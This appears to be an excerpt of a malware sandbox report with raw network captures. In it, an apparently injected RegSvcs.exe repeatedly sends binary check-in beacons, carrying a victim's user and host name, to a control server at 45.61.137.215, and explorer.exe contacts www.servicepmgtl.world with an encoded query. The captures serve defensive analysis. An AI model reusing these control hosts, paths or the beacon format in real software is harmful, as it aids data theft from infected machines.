                                            May 29, 2024 15:44:03.554945946 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:03.555242062 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:44:03.555274963 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            43192.168.2.94975845.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:03.719372988 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:03.724325895 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:06.246373892 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:04 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:06.246393919 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:06.246403933 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:06.246414900 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:44:06.246426105 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:44:06.246436119 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:06.246598005 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:06.246608019 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:06.246618032 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:44:06.246629000 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            44192.168.2.94975945.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:06.434631109 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:06.442980051 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:09.020404100 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:06 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:09.020417929 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:09.020427942 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:09.020437956 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:44:09.020451069 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:44:09.020503998 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:09.020584106 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:09.020603895 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:09.020618916 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:44:09.020628929 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            45192.168.2.949760104.21.10.127803504C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:07.397794008 CEST176OUTGET /dn03/?KvOx3=JxIrrZbNPaA1C4PrhImOUNe+2n/09vmdrEF53puJ8yJ2Z/h/8YXf47jUpRM+pbGXlchT&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1
                                            Host: www.servicepmgtl.world
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 29, 2024 15:44:07.874742985 CEST928INHTTP/1.1 301 Moved Permanently
                                            Date: Wed, 29 May 2024 13:44:07 GMT
                                            Content-Type: text/html
                                            Content-Length: 167
                                            Connection: close
                                            Cache-Control: max-age=3600
                                            Expires: Wed, 29 May 2024 14:44:07 GMT
                                            Location: https://www.servicepmgtl.world/dn03/?KvOx3=JxIrrZbNPaA1C4PrhImOUNe+2n/09vmdrEF53puJ8yJ2Z/h/8YXf47jUpRM+pbGXlchT&LhEx=ODKXZDVpY2w8gpmp
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhJKh%2FRobNIDR4dqwhLO8D4BGMhT1CZ8n9znLvd06P8zAcY8UsszWyJW9WXWUwTq%2FkShamnQksFrT30ySU%2FzEL4VEmQAFYWmCNgOFJtBGjuUEEtLzgHh8tCgGm5cLMqQImVJYVZEX3Lq"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 88b6ead8d9be19f3-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            46192.168.2.94976145.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:09.285919905 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:09.290848970 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:11.849642992 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:09 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:11.849659920 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
